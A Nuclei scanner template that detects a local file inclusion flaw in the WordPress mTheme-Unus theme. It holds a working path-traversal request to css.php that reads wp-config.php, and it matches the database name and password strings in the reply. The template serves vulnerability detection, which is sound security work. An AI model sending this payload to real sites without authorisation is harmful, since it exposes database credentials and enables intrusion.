id: mthemeunus-lfi

info:
  name: WordPress mTheme-Unus Theme - Local File Inclusion
  author: dhiyaneshDk
  severity: high
  description: WordPress mTheme-Unus Theme is vulnerable to local file inclusion via css.php.
  reference:
    - https://wpscan.com/vulnerability/bc036ee3-9648-49db-ae52-3a58fdeb82eb
    - https://packetstormsecurity.com/files/133778/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: wpscan,packetstorm,wordpress,wp-theme,lfi,mtheme

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205f23bbd153dd050cb67995e4319e07bb6b214150b0810fda5e978a92b50f1f7b022100dd8648ebb5cae995b92320bfd7f8fc60b1510eaa36db6747f1dae9d508bcd965:922c64590222798bb761d5b6d8e72950